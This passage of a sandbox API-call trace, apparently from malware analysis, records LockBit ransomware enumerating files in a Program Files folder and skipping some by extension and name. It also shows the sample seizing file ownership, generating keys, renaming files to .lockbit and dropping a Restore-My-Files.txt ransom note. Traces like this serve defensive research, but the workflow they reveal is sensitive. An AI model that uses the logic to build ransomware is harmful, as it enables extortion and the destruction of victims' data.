nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0085.912] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\vistabg.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\vistabg.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0085.912] malloc (_Size=0xac) returned 0x77d800 [0085.912] NtSetInformationFile (FileHandle=0x3c0, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xac, FileInformationClass=0xa) returned 0x0 [0085.913] free (_Block=0x77d800) [0085.913] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\vistabg.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles") returned 1 [0085.913] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\Restore-My-Files.txt") returned 76 [0085.913] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0085.913] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f97bea6, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f97bea6, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ef31505, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2fcdc, dwReserved0=0x0, dwReserved1=0x0, cFileName="vistabg.png", cAlternateFileName="")) returned 0 [0085.913] FindClose (in: hFindFile=0x55fe78 | out: hFindFile=0x55fe78) returned 1 [0085.913] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ea9b652, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ea9b652, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ee98f8d, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13d0, dwReserved0=0x520150, dwReserved1=0x0, cFileName="rectangle_babypink_Thumbnail.bmp", cAlternateFileName="")) returned 1 [0085.913] lstrcmpiW (lpString1=".", lpString2="rectangle_babypink_Thumbnail.bmp") returned -1 [0085.913] lstrcmpiW (lpString1="..", lpString2="rectangle_babypink_Thumbnail.bmp") returned -1 [0085.913] PathFindExtensionW (pszPath="rectangle_babypink_Thumbnail.bmp") returned=".bmp" [0085.913] lstrcmpiW (lpString1=".386", lpString2=".bmp") returned -1 [0085.913] lstrcmpiW (lpString1=".cmd", lpString2=".bmp") returned 1 [0085.913] lstrcmpiW (lpString1=".exe", lpString2=".bmp") returned 1 [0085.913] lstrcmpiW (lpString1=".ani", lpString2=".bmp") returned -1 [0085.913] lstrcmpiW (lpString1=".adv", lpString2=".bmp") returned -1 [0085.913] lstrcmpiW (lpString1=".theme", lpString2=".bmp") returned 1 [0085.913] lstrcmpiW (lpString1=".msi", lpString2=".bmp") returned 1 [0085.913] lstrcmpiW (lpString1=".msp", lpString2=".bmp") returned 1 [0085.913] lstrcmpiW (lpString1=".com", lpString2=".bmp") returned 1 [0085.914] lstrcmpiW (lpString1=".diagpkg", lpString2=".bmp") returned 1 [0085.914] lstrcmpiW (lpString1=".nls", lpString2=".bmp") returned 1 [0085.914] lstrcmpiW (lpString1=".diagcab", lpString2=".bmp") returned 1 [0085.914] lstrcmpiW (lpString1=".lock", lpString2=".bmp") returned 1 [0085.914] lstrcmpiW (lpString1=".ocx", lpString2=".bmp") returned 1 [0085.914] lstrcmpiW (lpString1=".mpa", lpString2=".bmp") returned 1 [0085.914] lstrcmpiW (lpString1=".cpl", lpString2=".bmp") returned 1 [0085.914] lstrcmpiW (lpString1=".mod", lpString2=".bmp") returned 1 [0085.914] lstrcmpiW (lpString1=".hta", lpString2=".bmp") returned 1 [0085.914] lstrcmpiW (lpString1=".icns", lpString2=".bmp") returned 1 [0085.914] lstrcmpiW (lpString1=".prf", lpString2=".bmp") returned 1 [0085.914] lstrcmpiW (lpString1=".rtp", lpString2=".bmp") returned 1 [0085.914] lstrcmpiW (lpString1=".diagcfg", lpString2=".bmp") returned 1 [0085.914] lstrcmpiW (lpString1=".msstyles", lpString2=".bmp") returned 1 [0085.914] lstrcmpiW (lpString1=".bin", lpString2=".bmp") returned -1 [0085.914] lstrcmpiW (lpString1=".hlp", lpString2=".bmp") returned 1 [0085.914] lstrcmpiW (lpString1=".shs", lpString2=".bmp") returned 1 [0085.914] lstrcmpiW (lpString1=".drv", lpString2=".bmp") returned 1 [0085.914] lstrcmpiW (lpString1=".wpx", lpString2=".bmp") returned 1 [0085.914] lstrcmpiW (lpString1=".bat", lpString2=".bmp") returned -1 [0085.914] lstrcmpiW (lpString1=".rom", lpString2=".bmp") returned 1 [0085.914] lstrcmpiW (lpString1=".msc", lpString2=".bmp") returned 1 [0085.914] lstrcmpiW (lpString1=".spl", lpString2=".bmp") returned 1 [0085.914] lstrcmpiW (lpString1=".ps1", lpString2=".bmp") returned 1 [0085.915] lstrcmpiW (lpString1=".msu", lpString2=".bmp") returned 1 [0085.915] lstrcmpiW (lpString1=".ics", lpString2=".bmp") returned 1 [0085.915] lstrcmpiW (lpString1=".key", lpString2=".bmp") returned 1 [0085.915] lstrcmpiW (lpString1=".mp3", lpString2=".bmp") returned 1 [0085.915] lstrcmpiW (lpString1=".reg", lpString2=".bmp") returned 1 [0085.915] lstrcmpiW (lpString1=".dll", lpString2=".bmp") returned 1 [0085.915] lstrcmpiW (lpString1=".ini", lpString2=".bmp") returned 1 [0085.915] lstrcmpiW (lpString1=".idx", lpString2=".bmp") returned 1 [0085.915] lstrcmpiW (lpString1=".sys", lpString2=".bmp") returned 1 [0085.915] lstrcmpiW (lpString1=".hlp", lpString2=".bmp") returned 1 [0085.915] lstrcmpiW (lpString1=".ico", lpString2=".bmp") returned 1 [0085.915] lstrcmpiW (lpString1=".lnk", lpString2=".bmp") returned 1 [0085.915] lstrcmpiW (lpString1=".rdp", lpString2=".bmp") returned 1 [0085.915] lstrcmpiW (lpString1=".lockbit", lpString2=".bmp") returned 1 [0085.915] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="rectangle_babypink_Thumbnail.bmp") returned 1 [0085.916] lstrcmpiW (lpString1="ntldr", lpString2="rectangle_babypink_Thumbnail.bmp") returned -1 [0085.916] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="rectangle_babypink_Thumbnail.bmp") returned -1 [0085.916] lstrcmpiW (lpString1="bootsect.bak", lpString2="rectangle_babypink_Thumbnail.bmp") returned -1 [0085.916] lstrcmpiW (lpString1="autorun.inf", lpString2="rectangle_babypink_Thumbnail.bmp") returned -1 [0085.916] lstrcmpiW (lpString1="thumbs.db", lpString2="rectangle_babypink_Thumbnail.bmp") returned 1 [0085.916] lstrcmpiW (lpString1="iconcache.db", lpString2="rectangle_babypink_Thumbnail.bmp") returned -1 [0085.916] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\") returned="" [0085.916] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_babypink_Thumbnail.bmp") returned=".bmp" [0085.916] lstrcmpiW (lpString1=".rar", lpString2=".bmp") returned 1 [0085.916] lstrcmpiW (lpString1=".zip", lpString2=".bmp") returned 1 [0085.916] lstrcmpiW (lpString1=".7z", lpString2=".bmp") returned -1 [0085.916] lstrcmpiW (lpString1=".ckp", lpString2=".bmp") returned 1 [0085.916] lstrcmpiW (lpString1=".dacpac", lpString2=".bmp") returned 1 [0085.916] lstrcmpiW (lpString1=".db", lpString2=".bmp") returned 1 [0085.916] lstrcmpiW (lpString1=".db-shm", lpString2=".bmp") returned 1 [0085.916] lstrcmpiW (lpString1=".db-wal", lpString2=".bmp") returned 1 [0085.916] lstrcmpiW (lpString1=".db3", lpString2=".bmp") returned 1 [0085.916] lstrcmpiW (lpString1=".dbf", lpString2=".bmp") returned 1 [0085.916] lstrcmpiW (lpString1=".dbc", lpString2=".bmp") returned 1 [0085.916] lstrcmpiW (lpString1=".dbs", lpString2=".bmp") returned 1 [0085.916] lstrcmpiW (lpString1=".dbt", lpString2=".bmp") returned 1 [0085.916] lstrcmpiW (lpString1=".dbv", lpString2=".bmp") returned 1 [0085.916] lstrcmpiW (lpString1=".frm", lpString2=".bmp") returned 1 [0085.917] lstrcmpiW (lpString1=".mdf", lpString2=".bmp") returned 1 [0085.917] lstrcmpiW (lpString1=".mrg", lpString2=".bmp") returned 1 [0085.917] lstrcmpiW (lpString1=".mwb", lpString2=".bmp") returned 1 [0085.917] lstrcmpiW (lpString1=".myd", lpString2=".bmp") returned 1 [0085.917] lstrcmpiW (lpString1=".ndf", lpString2=".bmp") returned 1 [0085.917] lstrcmpiW (lpString1=".qry", lpString2=".bmp") returned 1 [0085.917] lstrcmpiW (lpString1=".sdb", lpString2=".bmp") returned 1 [0085.917] lstrcmpiW (lpString1=".sdf", lpString2=".bmp") returned 1 [0085.917] lstrcmpiW (lpString1=".sql", lpString2=".bmp") returned 1 [0085.917] lstrcmpiW (lpString1=".sqlite", lpString2=".bmp") returned 1 [0085.917] lstrcmpiW (lpString1=".sqlite3", lpString2=".bmp") returned 1 [0085.917] lstrcmpiW (lpString1=".sqlitedb", lpString2=".bmp") returned 1 [0085.917] lstrcmpiW (lpString1=".tmd", lpString2=".bmp") returned 1 [0085.917] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_babypink_Thumbnail.bmp.lockbit") returned 85 [0085.917] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_babypink_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_babypink_thumbnail.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0085.922] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0085.922] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0085.922] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0085.922] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0085.922] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0085.922] RtlFreeAnsiString (AnsiString="\\") [0085.922] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6b908 | out: TokenHandle=0x3d6b908*=0x3a0) returned 0x0 [0085.922] malloc (_Size=0x200) returned 0x77d800 [0085.923] NtQueryInformationToken (in: TokenHandle=0x3a0, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6b900 | out: TokenInformation=0x77d800, ReturnLength=0x3d6b900) returned 0x0 [0085.923] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6b6bc, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0085.923] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6b6bc, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0085.923] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_babypink_Thumbnail.bmp", SecurityInformation=0x1, pSecurityDescriptor=0x3d6b6bc) returned 1 [0085.923] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_babypink_Thumbnail.bmp", SecurityInformation=0x4, pSecurityDescriptor=0x3d6b6bc) returned 1 [0085.923] CloseHandle (hObject=0x3a0) returned 1 [0085.923] free (_Block=0x77d800) [0085.923] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_babypink_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_babypink_thumbnail.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3a0 [0085.924] CreateIoCompletionPort (FileHandle=0x3a0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0085.924] malloc (_Size=0x40068) returned 0x1fb18c0 [0085.924] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=5072) returned 1 [0085.924] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.924] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.924] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0085.924] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.925] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.925] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0085.925] ReadFile (in: hFile=0x3a0, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0085.927] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_babypink_Thumbnail.bmp.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_babypink_Thumbnail.bmp.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0085.927] malloc (_Size=0xc0) returned 0x77d800 [0085.927] NtSetInformationFile (FileHandle=0x3a0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xc0, FileInformationClass=0xa) returned 0x0 [0085.927] free (_Block=0x77d800) [0085.927] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_babypink_Thumbnail.bmp" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles") returned 1 [0085.927] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt") returned 65 [0085.927] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0085.927] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ea9b652, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ea9b652, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ee98f8d, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13d0, dwReserved0=0x520150, dwReserved1=0x0, cFileName="rectangle_glass_Thumbnail.bmp", cAlternateFileName="")) returned 1 [0085.927] lstrcmpiW (lpString1=".", lpString2="rectangle_glass_Thumbnail.bmp") returned -1 [0085.928] lstrcmpiW (lpString1="..", lpString2="rectangle_glass_Thumbnail.bmp") returned -1 [0085.928] PathFindExtensionW (pszPath="rectangle_glass_Thumbnail.bmp") returned=".bmp" [0085.928] lstrcmpiW (lpString1=".386", lpString2=".bmp") returned -1 [0085.928] lstrcmpiW (lpString1=".cmd", lpString2=".bmp") returned 1 [0085.928] lstrcmpiW (lpString1=".exe", lpString2=".bmp") returned 1 [0085.928] lstrcmpiW (lpString1=".ani", lpString2=".bmp") returned -1 [0085.928] lstrcmpiW (lpString1=".adv", lpString2=".bmp") returned -1 [0085.928] lstrcmpiW (lpString1=".theme", lpString2=".bmp") returned 1 [0085.928] lstrcmpiW (lpString1=".msi", lpString2=".bmp") returned 1 [0085.928] lstrcmpiW (lpString1=".msp", lpString2=".bmp") returned 1 [0085.928] lstrcmpiW (lpString1=".com", lpString2=".bmp") returned 1 [0085.928] lstrcmpiW (lpString1=".diagpkg", lpString2=".bmp") returned 1 [0085.928] lstrcmpiW (lpString1=".nls", lpString2=".bmp") returned 1 [0085.928] lstrcmpiW (lpString1=".diagcab", lpString2=".bmp") returned 1 [0085.928] lstrcmpiW (lpString1=".lock", lpString2=".bmp") returned 1 [0085.928] lstrcmpiW (lpString1=".ocx", lpString2=".bmp") returned 1 [0085.928] lstrcmpiW (lpString1=".mpa", lpString2=".bmp") returned 1 [0085.928] lstrcmpiW (lpString1=".cpl", lpString2=".bmp") returned 1 [0085.928] lstrcmpiW (lpString1=".mod", lpString2=".bmp") returned 1 [0085.928] lstrcmpiW (lpString1=".hta", lpString2=".bmp") returned 1 [0085.928] lstrcmpiW (lpString1=".icns", lpString2=".bmp") returned 1 [0085.928] lstrcmpiW (lpString1=".prf", lpString2=".bmp") returned 1 [0085.928] lstrcmpiW (lpString1=".rtp", lpString2=".bmp") returned 1 [0085.928] lstrcmpiW (lpString1=".diagcfg", lpString2=".bmp") returned 1 [0085.928] lstrcmpiW (lpString1=".msstyles", lpString2=".bmp") returned 1 [0085.928] lstrcmpiW (lpString1=".bin", lpString2=".bmp") returned -1 [0085.928] lstrcmpiW (lpString1=".hlp", lpString2=".bmp") returned 1 [0085.929] lstrcmpiW (lpString1=".shs", lpString2=".bmp") returned 1 [0085.929] lstrcmpiW (lpString1=".drv", lpString2=".bmp") returned 1 [0085.929] lstrcmpiW (lpString1=".wpx", lpString2=".bmp") returned 1 [0085.929] lstrcmpiW (lpString1=".bat", lpString2=".bmp") returned -1 [0085.929] lstrcmpiW (lpString1=".rom", lpString2=".bmp") returned 1 [0085.929] lstrcmpiW (lpString1=".msc", lpString2=".bmp") returned 1 [0085.929] lstrcmpiW (lpString1=".spl", lpString2=".bmp") returned 1 [0085.929] lstrcmpiW (lpString1=".ps1", lpString2=".bmp") returned 1 [0085.929] lstrcmpiW (lpString1=".msu", lpString2=".bmp") returned 1 [0085.929] lstrcmpiW (lpString1=".ics", lpString2=".bmp") returned 1 [0085.929] lstrcmpiW (lpString1=".key", lpString2=".bmp") returned 1 [0085.929] lstrcmpiW (lpString1=".mp3", lpString2=".bmp") returned 1 [0085.929] lstrcmpiW (lpString1=".reg", lpString2=".bmp") returned 1 [0085.929] lstrcmpiW (lpString1=".dll", lpString2=".bmp") returned 1 [0085.929] lstrcmpiW (lpString1=".ini", lpString2=".bmp") returned 1 [0085.929] lstrcmpiW (lpString1=".idx", lpString2=".bmp") returned 1 [0085.929] lstrcmpiW (lpString1=".sys", lpString2=".bmp") returned 1 [0085.929] lstrcmpiW (lpString1=".hlp", lpString2=".bmp") returned 1 [0085.929] lstrcmpiW (lpString1=".ico", lpString2=".bmp") returned 1 [0085.929] lstrcmpiW (lpString1=".lnk", lpString2=".bmp") returned 1 [0085.929] lstrcmpiW (lpString1=".rdp", lpString2=".bmp") returned 1 [0085.929] lstrcmpiW (lpString1=".lockbit", lpString2=".bmp") returned 1 [0085.929] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="rectangle_glass_Thumbnail.bmp") returned 1 [0085.929] lstrcmpiW (lpString1="ntldr", lpString2="rectangle_glass_Thumbnail.bmp") returned -1 [0085.930] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="rectangle_glass_Thumbnail.bmp") returned -1 [0085.930] lstrcmpiW (lpString1="bootsect.bak", lpString2="rectangle_glass_Thumbnail.bmp") returned -1 [0085.930] lstrcmpiW (lpString1="autorun.inf", lpString2="rectangle_glass_Thumbnail.bmp") returned -1 [0085.930] lstrcmpiW (lpString1="thumbs.db", lpString2="rectangle_glass_Thumbnail.bmp") returned 1 [0085.930] lstrcmpiW (lpString1="iconcache.db", lpString2="rectangle_glass_Thumbnail.bmp") returned -1 [0085.930] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\") returned="" [0085.930] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_glass_Thumbnail.bmp") returned=".bmp" [0085.930] lstrcmpiW (lpString1=".rar", lpString2=".bmp") returned 1 [0085.930] lstrcmpiW (lpString1=".zip", lpString2=".bmp") returned 1 [0085.930] lstrcmpiW (lpString1=".7z", lpString2=".bmp") returned -1 [0085.930] lstrcmpiW (lpString1=".ckp", lpString2=".bmp") returned 1 [0085.930] lstrcmpiW (lpString1=".dacpac", lpString2=".bmp") returned 1 [0085.930] lstrcmpiW (lpString1=".db", lpString2=".bmp") returned 1 [0085.930] lstrcmpiW (lpString1=".db-shm", lpString2=".bmp") returned 1 [0085.930] lstrcmpiW (lpString1=".db-wal", lpString2=".bmp") returned 1 [0085.930] lstrcmpiW (lpString1=".db3", lpString2=".bmp") returned 1 [0085.930] lstrcmpiW (lpString1=".dbf", lpString2=".bmp") returned 1 [0085.930] lstrcmpiW (lpString1=".dbc", lpString2=".bmp") returned 1 [0085.930] lstrcmpiW (lpString1=".dbs", lpString2=".bmp") returned 1 [0085.930] lstrcmpiW (lpString1=".dbt", lpString2=".bmp") returned 1 [0085.930] lstrcmpiW (lpString1=".dbv", lpString2=".bmp") returned 1 [0085.930] lstrcmpiW (lpString1=".frm", lpString2=".bmp") returned 1 [0085.930] lstrcmpiW (lpString1=".mdf", lpString2=".bmp") returned 1 [0085.930] lstrcmpiW (lpString1=".mrg", lpString2=".bmp") returned 1 [0085.931] lstrcmpiW (lpString1=".mwb", lpString2=".bmp") returned 1 [0085.931] lstrcmpiW (lpString1=".myd", lpString2=".bmp") returned 1 [0085.931] lstrcmpiW (lpString1=".ndf", lpString2=".bmp") returned 1 [0085.931] lstrcmpiW (lpString1=".qry", lpString2=".bmp") returned 1 [0085.931] lstrcmpiW (lpString1=".sdb", lpString2=".bmp") returned 1 [0085.931] lstrcmpiW (lpString1=".sdf", lpString2=".bmp") returned 1 [0085.931] lstrcmpiW (lpString1=".sql", lpString2=".bmp") returned 1 [0085.931] lstrcmpiW (lpString1=".sqlite", lpString2=".bmp") returned 1 [0085.931] lstrcmpiW (lpString1=".sqlite3", lpString2=".bmp") returned 1 [0085.931] lstrcmpiW (lpString1=".sqlitedb", lpString2=".bmp") returned 1 [0085.932] lstrcmpiW (lpString1=".tmd", lpString2=".bmp") returned 1 [0085.932] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_glass_Thumbnail.bmp.lockbit") returned 82 [0085.932] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_glass_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_glass_thumbnail.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0085.932] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0085.932] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0085.932] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0085.933] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0085.933] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0085.933] RtlFreeAnsiString (AnsiString="\\") [0085.933] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6b908 | out: TokenHandle=0x3d6b908*=0x3ac) returned 0x0 [0085.933] malloc (_Size=0x200) returned 0x77d800 [0085.933] NtQueryInformationToken (in: TokenHandle=0x3ac, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6b900 | out: TokenInformation=0x77d800, ReturnLength=0x3d6b900) returned 0x0 [0085.933] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6b6bc, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0085.933] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6b6bc, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0085.933] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_glass_Thumbnail.bmp", SecurityInformation=0x1, pSecurityDescriptor=0x3d6b6bc) returned 1 [0085.934] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_glass_Thumbnail.bmp", SecurityInformation=0x4, pSecurityDescriptor=0x3d6b6bc) returned 1 [0085.935] CloseHandle (hObject=0x3ac) returned 1 [0085.935] free (_Block=0x77d800) [0085.935] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_glass_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_glass_thumbnail.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3ac [0085.935] CreateIoCompletionPort (FileHandle=0x3ac, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0085.935] malloc (_Size=0x40068) returned 0x3df0008 [0085.935] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=5072) returned 1 [0085.935] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.936] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.936] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0085.936] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.936] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.936] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0085.936] ReadFile (in: hFile=0x3ac, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0085.942] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_glass_Thumbnail.bmp.lockbit", NtPathName=0x3d6b8e8, 